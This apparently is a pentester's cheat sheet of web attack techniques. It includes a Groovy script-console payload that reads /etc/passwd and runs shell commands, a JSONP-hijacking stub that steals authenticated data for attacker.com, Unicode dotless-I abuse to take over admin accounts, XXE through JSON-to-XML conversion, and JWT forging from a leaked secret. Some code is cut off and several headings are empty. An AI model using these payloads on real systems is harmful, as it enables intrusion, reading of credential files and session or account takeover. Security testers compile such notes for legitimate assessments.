Groovy Script Console


new File("/etc/passwd").withReader('UTF-8') { reader ->
def line
    while ((line = reader.readLine()) != null) { 
        println "${line}"


def process = "ls -lah".execute()
println "${process.text}"
def sout = new StringBuffer(), serr = new StringBuffer()
def proc = 'ls -lah'.execute()
proc.consumeProcessOutput(sout, serr)
println "$sout"


Only useful if a jsonp endpoints requires authentication. A Victim at attacker.com will retrieve the data from victim.com and send its cookie along because of how jsonp works (Reference: https://www.sjoerdlangkemper.nl/2019/01/02/jsonp/).

function xct(a) {


<script src="targeturl?callback=xct"></script>

Unicode Abuse

We can use some special characters like the dotless I to abuse "toUpperCase()", registering for example an admin email address. Reference: https://eng.getwisdom.io/hacking-github-with-unicode-dotless-i/

Json to XML

Change JSON Post requests to XML Format, sometimes this works and can be used for XXE, e.g. https://twitter.com/11xuxx/status/1250764273623629826

HTTP/3 Clients

docker run -it 'ymuski/curl-http3' bash

Interactive Shell from Web Shell

Timeless Timing Attacks against Remote Targets

The idea is to use HTTP2 to send multiple requests in one which allows us to measure the difference, by looking at which comes back first. Repeat this a lot to get some statistical relevance.

Create JWT from Secret Key via PyJWT

import jwt
data = {"data": {"username": "xct"}}
print(jwt.encode(data, "6cb9...", algorithm="HS256"))

Last updated